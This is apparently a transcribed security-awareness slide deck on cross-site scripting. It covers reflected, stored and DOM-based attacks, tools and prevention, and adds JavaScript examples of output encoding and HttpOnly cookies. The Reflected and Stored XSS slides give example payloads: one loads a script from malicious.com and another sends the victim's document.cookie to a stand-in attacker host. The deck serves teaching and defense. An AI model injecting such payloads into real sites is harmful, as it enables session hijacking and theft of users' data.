WARNING – YOU’VE BEEN XSSED!
SMARTTALK
Quick facts
- 82% of web applications are vulnerable to XSS (2013)
2/6/2018, APPLICATION PERFORMANCE MANAGEMENT SERVICE OFFERING OVERVIEW, Page 2
- 7 out of 10 web applications are vulnerable to XSS (2014)
- 60% of web applications are vulnerable to XSS (2013)
- #3 in the OWASP TOP-10 (2013)
Please welcome – XSS!
• What is XSS
– XSS – Cross-Site Scripting
– It is an attack against the users of a vulnerable web application
• Goal
– Execute code (JavaScript) in the victim’s browser in the context of the attacked web application
How it WORKS???
[Diagram: “Link with hidden code”, “Personal Data”, WWW.SUPERBANK.ORG]
XSS Types
• By attack vector
- Reflected or passive XSS (Type 1)
- Stored or active XSS (Type 2)
- DOM Based XSS (Type 0)
• By injection channel
- Browser errors/bugs
- Lack of input validation/filtering
- Substitution of page encoding
Reflected XSS
[Diagram: WWW.SUPERBANK.ORG login form (Login / *******), phishing e-mail, www.malicious.com]
Hi Mr. Pibody,
Please check our monthly report on our site:
http://www.superbank.org/rep_page.aspx?monthly=<script src="http://malicious.com/sc.js"></script>
Victim loads JavaScript from the attacker’s site
Stored XSS
[Diagram: WWW.SUPERBANK.ORG login form (Login / *******), www.malicious.com]
Attacker injects active content into the report’s “comments”
Victim accesses the report with the employees’ “comments”
Interesting report!!!<script>document.write('<img src="http://www.malicious.com/evilsmile.gif?' + escape(document.cookie) + '"/>')</script>
Victim unknowingly sends the cookie to www.malicious.com
Attacker can now act on behalf of the victim using the session ID from the cookie
DOM Based XSS
• The web page itself modifies the DOM (Document Object Model)
• Hard to find
Example of simple vulnerable HTML (a simple HTML DOM tree):
<body>
<script>document.write(location.href);</script>
</body>
How to exploit???
http://site.com/test.html#<script>alert('xss');</script>
DOM XSS Wiki
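Added example (not from the slides): the vulnerable sink above is document.write(location.href). Because there is no DOM outside a browser, the example models that sink as a function that returns the HTML the page would write, then shows the same render with the value encoded for the HTML text context. The URL is the one from the slide; function names are this example’s own.

```javascript
// Vulnerable model of `document.write(location.href)`: the URL, including
// its #fragment, is written straight into the page, so any markup in the
// fragment becomes live DOM.
function renderHrefUnsafe(href) {
  return `<body><p>You are at: ${href}</p></body>`;
}

// Minimal HTML encoder for the text (body) context.
function escapeHtml(text) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(text).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Hardened model: same output shape, but the untrusted value is encoded
// before it reaches the HTML sink. In a real page the equivalent fix is
// `el.textContent = location.href` instead of document.write.
function renderHrefSafe(href) {
  return `<body><p>You are at: ${escapeHtml(href)}</p></body>`;
}

// Client-side check: does the fragment contain something that would be
// parsed as a tag if it reached an HTML sink unencoded? Fragments are
// never sent to the server, so server logs and a WAF cannot see them;
// this is the only place such a check can run.
function fragmentLooksLikeMarkup(href) {
  const hash = href.indexOf('#');
  if (hash === -1) return false;
  let fragment = href.slice(hash + 1);
  try {
    fragment = decodeURIComponent(fragment);
  } catch (e) {
    // Malformed percent-encoding: keep the raw fragment.
  }
  return /<\s*\/?\s*[a-z]/i.test(fragment);
}

// Constructed input: the URL shown on the slide.
const DEMO_HREF = "http://site.com/test.html#<script>alert('xss');</script>";

console.log('unsafe:', renderHrefUnsafe(DEMO_HREF));
console.log('safe:  ', renderHrefSafe(DEMO_HREF));
console.log('fragment looks like markup:', fragmentLooksLikeMarkup(DEMO_HREF));
```

The unsafe render contains a literal script element; the safe render contains only &lt;script&gt; text, which the browser displays and never executes.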
How XSS can be used
• Stealing cookies
- Session hijacking
- Personal data theft
- Unauthorized access to the web application
- Reputation loss
• Stealing forms
- Personal data theft
- Unauthorized access to the web application
- Reputation loss
• DDoS attack
- Reputation loss
• XSS worms
- Personal data theft
- Unauthorized access to the web application
- Reputation loss
Tools
XENOTIX
- OWASP project
- Actively developed
- Multi-browser test support
- Lots of other features
- Freeware
XSSF
- Metasploit plugin
- Console-based utility
- Web-based GUI present
- Creates a communication channel with the victim’s browser
- Freeware
BeEF
- Powerful security framework with
- Console-based utility
- Web-based GUI present
- Simple and powerful API
- Freeware
DOMinatorPro
- Scanning automation
- Ready data: real-time dynamic data tainting
- Automatic exploitability check
- Shareware
How to prevent?
• Server-side protection:
– Input validation – do NOT trust anything that comes from users (even cookies)
– Use the HttpOnly flag
– Use SSL
– Do not store confidential data in cookies
– Encoding of HTML symbols, JavaScript, CSS and URLs
– Use filtering functions (like filter_sanitize_encoded, htmlentities, filter_sanitize_magic_quotes, etc.) for incoming data filtering
– Use dedicated libraries for incoming data encoding (HTML Purifier or Htmlawed, PHP Anti-XSS Class, AntiSamy API, XSS-HTML-Filter)
• Client-side protection
– Use browser plugins (NoScript for Firefox and NotScripts for Opera and Chrome)
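Added example (not from the slides, and not any of the listed libraries): it covers three items from this slide, encoding for the JavaScript-string and URL contexts (the HTML context is covered by the DOM XSS example), plus an HttpOnly/Secure session cookie, which is what stops the document.cookie exfiltration shown on the Stored XSS slide. The function names, the cookie name SESSIONID and the report URL are this example’s own assumptions.

```javascript
// Encode a value for use inside a JavaScript string literal embedded in a
// page. Every non-alphanumeric character becomes \xHH or \uHHHH, so the
// value can never terminate the string or the enclosing <script> block.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, (ch) => {
    const code = ch.charCodeAt(0);
    return code < 256
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// Build a URL whose query values are untrusted. Parameter names are fixed
// by the application; every value is percent-encoded, so "<" and ">" can
// never be reflected into the page as markup.
function buildReportUrl(base, params) {
  const query = Object.entries(params)
    .map(([k, v]) => `${encodeURIComponent(k)}=${encodeURIComponent(v)}`)
    .join('&');
  return `${base}?${query}`;
}

// Build a Set-Cookie header for the session cookie. HttpOnly hides it from
// document.cookie (the sink used in the stored-XSS payload); Secure limits
// it to TLS, matching the "use SSL" advice on the slide.
function sessionCookieHeader(name, value, opts = {}) {
  const { httpOnly = true, secure = true, maxAge } = opts;
  // Conservative subset of the RFC 6265 token grammar for the name.
  if (!/^[A-Za-z0-9_\-]+$/.test(name)) {
    throw new Error('invalid cookie name');
  }
  // Reject values that would need quoting or could inject a second attribute.
  if (/[\s;,"\\]/.test(value)) {
    throw new Error('cookie value contains characters that are not allowed');
  }
  const parts = [`${name}=${value}`, 'Path=/'];
  if (maxAge !== undefined) parts.push(`Max-Age=${maxAge}`);
  if (secure) parts.push('Secure');
  if (httpOnly) parts.push('HttpOnly');
  return parts.join('; ');
}

// Audit helper for reviewing captured responses: which of the two flags
// is missing from a Set-Cookie header?
function missingCookieFlags(setCookieHeader) {
  const attrs = setCookieHeader
    .split(';')
    .slice(1)
    .map((a) => a.trim().toLowerCase());
  const missing = [];
  if (!attrs.includes('httponly')) missing.push('HttpOnly');
  if (!attrs.includes('secure')) missing.push('Secure');
  return missing;
}

// Constructed demo input: the reflected-XSS style payload as a query value.
const DEMO_PAYLOAD = '<script src="x"></script>';

console.log('js string :', encodeForJsString(DEMO_PAYLOAD));
console.log('url       :', buildReportUrl('http://www.superbank.org/rep_page.aspx', { monthly: DEMO_PAYLOAD }));
console.log('cookie    :', sessionCookieHeader('SESSIONID', 'abc123'));
console.log('audit     :', missingCookieFlags('SESSIONID=abc123; Path=/'));
```

Each encoder is tied to one output context: a value encoded with encodeForJsString is safe only inside a JavaScript string literal, and a value from encodeURIComponent is safe only as a URL component. Reusing one encoder for a different context is the usual way output encoding fails.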
How about we talk about XSS!